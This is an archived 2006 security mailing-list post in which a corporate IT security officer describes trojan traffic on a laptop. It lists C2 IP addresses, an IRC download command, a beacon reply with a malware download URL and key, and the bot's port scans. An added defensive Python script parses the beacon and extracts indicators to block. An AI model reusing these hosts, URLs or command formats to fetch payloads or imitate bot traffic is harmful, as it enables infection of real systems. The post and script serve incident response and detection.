Security Incidents mailing list archives
Malware/trojan attacks
From: "Goetz, Richard" <RGoetz () Kronos com>
Date: Tue, 24 Oct 2006 10:53:52 -0400
Over the last several months we have on more than one occasion uncovered a number of Trojans that appear to be seeking corporate information, sending that over a chat session to/through several European sites and downloading additional programs to the infected computer. Here's a short synopsis of the type of conversations one of our people uncovered on a laptop on the network:

- Contacts 203.121.73.136 on port TCP/17555. IRC commands were sent to the workstation to run a command "staticftp" 70.84.109.84 to download a program x.exe.
- Instructed to launch 5 scans (netapi on port 137, wkssvc port 445, asn on port 445, dcom on port 135 and lsass on port 445).
- Connects to 66.36.243.116 on TCP/80 and starts a PHP-based conversation, giving the workstation credentials to the host and receiving the following information:
  CARGO:smtp_purple; MOD:smtp; PATH:http://niuqennaois.com/s2.5.exe; SERVER:209.160.64.216; REFRESH:2700;KEY:864a1bae77fc8053055d02550ed7b49c;
- Connects to 195.49.141.23 on TCP/3144, retrieving unreadable data.
- Connects to 66.36.243.116 on TCP/80, exchanging credentials via PHP:
  To host: uuid <wsname>_547611528 wv mag5_min0_build2195_Service_Pack_4 cargo check purple
  To workstation: REFRESH:3600; KEY: 864a1bae77fc8053055d02550ed7b49c;
- HTTP connections are made to 66.45.232.66, 66.36.243.116 to perform similar PHP and download conversations.
- Three-way TCP handshakes are attempted to 74.52.53.66, 68.142.212.41 and 68.142.212.93 on TCP/80, but no further conversation was made.

My questions are:

1. Are other folks in the community seeing this kind of activity?
2. Aside from deleting what you can find, what other actions are recommended/required? Who, if anyone, in the community or law enforcement should be notified?

If this post should be somewhere else, please let me know.
Thanks,
Richard Goetz
IT Security Officer
Kronos, Incorporated
Phone: 978-947-2819
Fax: 978-256-3919
RGoetz () Kronos com
Experts at Improving the Performance of People and Business
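The traffic pattern in the post above (an IRC command channel on an odd port, a burst of scans against ports 135/137/445, and an HTTP check-in whose reply is a "KEY:value;" list naming a download PATH, a SERVER and a REFRESH interval) can be triaged mechanically once you have flow or proxy records. The script below is an added example, not code from the post or from the list: it parses that "CARGO/MOD/PATH/SERVER/REFRESH/KEY" response format, flags the host doing the lateral scanning, and pulls out the indicators worth blocking. The IPs, domain and key are the ones reported in the post; the 10.x host addresses, the event tuple layout and the exact IRC payload text are assumptions constructed for the example.

```python
"""Triage helpers for the bot traffic described in the post."""
import re
from collections import defaultdict

# Constructed sample events: (source, destination, dst_port, payload).
# External IPs, domain and KEY come from the post; the 10.x hosts and the
# literal IRC/HTTP payload text are assumed for this example.
WORKSTATION = "10.1.2.3"
EVENTS = [
    (WORKSTATION, "203.121.73.136", 17555, "PRIVMSG #c :.staticftp 70.84.109.84 x.exe"),
    (WORKSTATION, "10.1.2.50", 137, ""),   # netapi
    (WORKSTATION, "10.1.2.51", 445, ""),   # wkssvc
    (WORKSTATION, "10.1.2.52", 445, ""),   # asn
    (WORKSTATION, "10.1.2.53", 135, ""),   # dcom
    (WORKSTATION, "10.1.2.54", 445, ""),   # lsass
    (WORKSTATION, "66.36.243.116", 80,
     "CARGO:smtp_purple; MOD:smtp; PATH:http://niuqennaois.com/s2.5.exe; "
     "SERVER:209.160.64.216; REFRESH:2700;KEY:864a1bae77fc8053055d02550ed7b49c;"),
    (WORKSTATION, "195.49.141.23", 3144, ""),
    (WORKSTATION, "66.36.243.116", 80, "REFRESH:3600; KEY: 864a1bae77fc8053055d02550ed7b49c;"),
    ("10.1.2.9", "10.1.2.50", 445, ""),    # one ordinary SMB connection from another host
]

LATERAL_PORTS = {135, 137, 139, 445}


def parse_c2_response(text):
    """Split 'KEY:value; KEY:value;' into a dict.

    Splits each item on the first colon only, so a value that itself contains
    colons (the PATH URL) survives intact, and tolerates the missing space in
    'REFRESH:2700;KEY:...' exactly as it appeared in the captured reply."""
    fields = {}
    for item in text.split(";"):
        item = item.strip()
        if not item or ":" not in item:
            continue
        key, value = item.split(":", 1)
        fields[key.strip().upper()] = value.strip()
    return fields


def is_c2_response(text):
    """Heuristic: a reply carrying both KEY and REFRESH has the beacon shape."""
    fields = parse_c2_response(text)
    return "KEY" in fields and "REFRESH" in fields


def scanning_hosts(events, ports=LATERAL_PORTS, threshold=5):
    """Sources that touched at least `threshold` distinct (dst, port) pairs on
    the lateral-movement ports; the post reported five such scans."""
    hits = defaultdict(set)
    for src, dst, port, _payload in events:
        if port in ports and src != dst:
            hits[src].add((dst, port))
    return sorted(src for src, pairs in hits.items() if len(pairs) >= threshold)


# Matches an IRC bot command such as ".staticftp <source> <file>".
IRC_CMD = re.compile(r"\bPRIVMSG\b.*?[.!](\w+)\s+(\S+)\s+(\S+)")


def extract_iocs(events):
    """Collect blockable indicators: external destinations, the download URL
    and its host, the IP named in the IRC download command, and the beacon KEY."""
    iocs = {"ips": set(), "urls": set(), "hosts": set(), "keys": set()}
    for _src, dst, port, payload in events:
        if port in LATERAL_PORTS:
            continue  # internal scan targets are victims, not indicators
        iocs["ips"].add(dst)
        m = IRC_CMD.search(payload)
        if m:
            iocs["ips"].add(m.group(2))  # 70.84.109.84 from the staticftp command
        fields = parse_c2_response(payload)
        if "PATH" in fields:
            iocs["urls"].add(fields["PATH"])
            iocs["hosts"].add(re.sub(r"^\w+://([^/]+).*$", r"\1", fields["PATH"]))
        if "SERVER" in fields:
            iocs["ips"].add(fields["SERVER"])
        if "KEY" in fields:
            iocs["keys"].add(fields["KEY"])
    return {k: sorted(v) for k, v in iocs.items()}


def triage(events=EVENTS):
    """One-shot summary: who is scanning, which flows look like beacons, what to block."""
    return {
        "scanners": scanning_hosts(events),
        "beacons": [(dst, port) for _s, dst, port, p in events if is_c2_response(p)],
        "iocs": extract_iocs(events),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(triage(), indent=2))
```

Running `triage()` on the constructed events names 10.1.2.3 as the scanner, both HTTP replies from 66.36.243.116 as beacons, and yields a block list containing the C2 hosts, the staticftp source, the SERVER address, the s2.5.exe URL and the KEY value; the same functions can be pointed at real proxy or IDS output once it is reduced to the same four-field tuples.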
Current thread:
- Malware/trojan attacks Goetz, Richard (Oct 24)
- RE: Malware/trojan attacks lucretias (Oct 26)
- RE: Malware/trojan attacks Harlan Carvey (Oct 26)
- RE: Malware/trojan attacks lucretias (Oct 26)
- RE: Malware/trojan attacks Harlan Carvey (Oct 26)
- <Possible follow-ups>
- Re: Malware/trojan attacks krokofish (Oct 25)
- RE: Malware/trojan attacks lucretias (Oct 26)